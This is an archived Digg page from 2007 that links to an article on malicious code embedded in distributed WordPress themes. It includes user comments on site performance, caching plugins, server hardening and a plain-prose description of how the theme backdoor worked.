digg

Facebook Connect Join Digg About

WordPress Themes & Web Security

gigaom.com WordPress is growing quickly - both as a hosted platform and also via standalone blog installations. The rapid growth and its open, flexible approach to blog design, means it may become a target for hackers who embed malicious code within themes they distribute.

Who dugg this? Made popular Nov 27, 2007

Digg DudeWhat is Digg?

Digg is a place for people to discover and share content from anywhere on the web. Digg surfaces the best stuff as submitted and voted on by the community. Take the Tour to learn more.

27 Comments

show profanity settings
expand all
  • inactive, on 11/27/2007, -8/+27WordPress should first fix the Digg effect.
  • thailand1972, on 11/27/2007, -6/+14A denial of service attack on a WP blog ..... just get yourself and 2 friends to hit the same WP site at the same time...
  • farrukhblogger, on 11/27/2007, -0/+6This article gives a newer level of understanding regarding security issue with wordpress platform. It's the wordpress who need to come in action and only than we can have something substantial. The proposed idea of certification for themes and plugins is intelligent one and we need to look into it since it will save many newbies like myself from getting trapped into any malicious act. Thanks for writing such a nice article.
  • lucidguru, on 11/27/2007, -1/+6WP-Cache?
  • headzoo, on 11/27/2007, -1/+6You mean lousy web hosts need to fix the Digg effect. It's been pointed out time and again, that sites like Techcrunch use WordPress, and they live with the Digg effect 24/7. I've been dugg in the past, and my WP blog held up just fine (Even without using wp-cache). That's because I don't use Cheap-O-Matic Inc. web hosting. I don't use expensive hosting either. But when you pay $4 a month for hosting, you get what you payed for.
  • inactive, on 11/27/2007, -3/+6Wordpress needs a better posting system.
  • Rammsteined, on 11/27/2007, -5/+8WordPress is poorly designed from the start, just like a lot of other (mostly older) PHP scripts.

    This might sound like general bashing of PHP, but it isn't, because it's perfectly possible to write a secure, easy to use, easy to customize script in PHP, exactly what WordPress is not.

    If you want to look at a well written script, have a look at MyTopix (yeah, a forum), it uses a well thought out OOP software design and even better, it uses XSL for templating. See http://jaia-interactive.com/.

    And no, I'm not affiliated with MyTopix in any way - I don't even use it!
  • fak3r, on 11/27/2007, -0/+3Patch the roots first, then Wordpress later.
    PHP - Sudokin (hardened PHP)
    PHP - secure php.ini (do a Google search)
    MySQL - locked down my.cnf
    WWW - well locked down www server (I now use Lighttpd, but Apache can be very secure too, just more to config)
    System - should go without saying, but lock your system down (I use Debian because it's easy)
  • richardiscool, on 11/27/2007, -3/+5I thought that was the Wordpress slogan?
  • theotheragentm, on 11/27/2007, -0/+2Don't forget WP Super Cache. http://ocaoimh.ie/2007/11/26/digg-users-will-love- ...
  • Aroundtown27, on 11/27/2007, -6/+8The only reason I clicked on the headline was to see if it was down.....
  • Rammsteined, on 12/18/2007, -0/+1Downloads are on the forum, sorry.
  • aweblogs, on 11/27/2007, -3/+4Where you download a theme is quite important, some designers place codes in the footer to prevent us from editing the theme and removing the links in the footer.
    Top 10 theme download sites:
    http://wpthemesplugin.com/top-10-alternative-wordp ...
  • shad0bear, on 11/27/2007, -0/+1There are better ways to track who is using your theme. You could embed a into the theme that is a 1 pixel transparent gif located on your site. Then you just parse your log files to get the Refer for the requests.
    I agree with fak3r. You need to lock down the server first. I also suggest running Apache in a chroot if possible. Plus disable Server Signatures and php error generation too. You don't want any information leaking to a potential hacker about your setup.
  • fak3r, on 11/27/2007, -1/+2"because it's perfectly possible to write a secure, easy to use, easy to customize script in PHP"

    This is the point I always try to make, it's not that PHP is inherently bad, it's just that it's very simple to make it do things; thus most of the time it's not coded the way it should be for security. It's like saying a car is unsafe because there are a lot of accidents.
  • BlaenkDenum, on 12/08/2007, -0/+1It's not WordPress... It's the web hosting and what the user puts on a page. If the author uses AJAX to wipe his ass and has tons of widgets and images and scripts, it will take even longer to load making the chances of it not surviving the Digg effect more likely.

    WP-Cache, although great at the time, is old and should not be used anymore. The future is with WP-SuperCache, which still uses WP-Cache in a way.
  • farr, on 11/27/2007, -0/+1This is a great general practice, but in this case all the PHP is doing is including Jvascript. The threat is not to the server at all, but rather in downloaded javascript that is presented to visitors. What WP should do is limit the kinds of code that can be executed in their themes!
  • gbak39, on 12/04/2007, -0/+0Because blogs are such widely used tools on the internet, it only makes sense that hackers are now targeting them. WordPress users need to be more aware of this type of activity and take the proper security actions to protect their sites.
  • phenomina3, on 11/29/2007, -0/+0This is legit!! It would be really cool for up and coming programmers to practice. But, it could also be pretty bad if a hacker get into it. It's just a fun program that lets people write code while expressing themselves. Just leave it alone.....
  • acroll, on 11/28/2007, -0/+0Actually, what it's doing is pulling in an arbitrary string that Wordpress is then parsing as an additional PHP tag. It can be anything. I had a close look at the structure of the exploit and it opens a socket, pulls in a string, then tells PHP to evaluate it. That could be as simple as sending out a print statement of HTML, or something nastier.
  • senorjt, on 11/27/2007, -1/+1Well, you state this with such authority so I clicked on the link looking for a whitepaper or downloadable code. I found neither. So, are you privy to insider info or do you make your judgment of the product's superior design based on UI and workflow issues only?

    Curious.
  • PARAPA, on 11/27/2007, -4/+4"Error establishing database connection"...
  • ertz, on 11/27/2007, -4/+4like I had something worth hacking on my weblog. just gpl'd icons...
  • V1ncent, on 11/27/2007, -1/+1It's not Wordpress that's growing quickly, it's the number of crashes per install.
  • jonathankimmm, on 11/27/2007, -4/+2I smell a movie in the making..........
  • munky100, on 11/27/2007, -3/+1The theme creators can also input their own code to track who is using their themes, it's not always the download sites who are doing it!
  • funkyjunk3, on 11/27/2007, -6/+3Wordpress - the bain of the Digg front page

  • Add a Comment

    Login or register to comment!
    Or, sign-in super fast with your Facebook account ...

© Digg Inc. 2009 — Content created and posted by Digg users is dedicated to the public domain | Terms of Use Updated | Privacy Policy
DIGG, DIGG IT, DUGG, DIGG THIS, Digg graphics, logos, designs, page headers, button icons, scripts, and other service names are the trademarks of Digg Inc.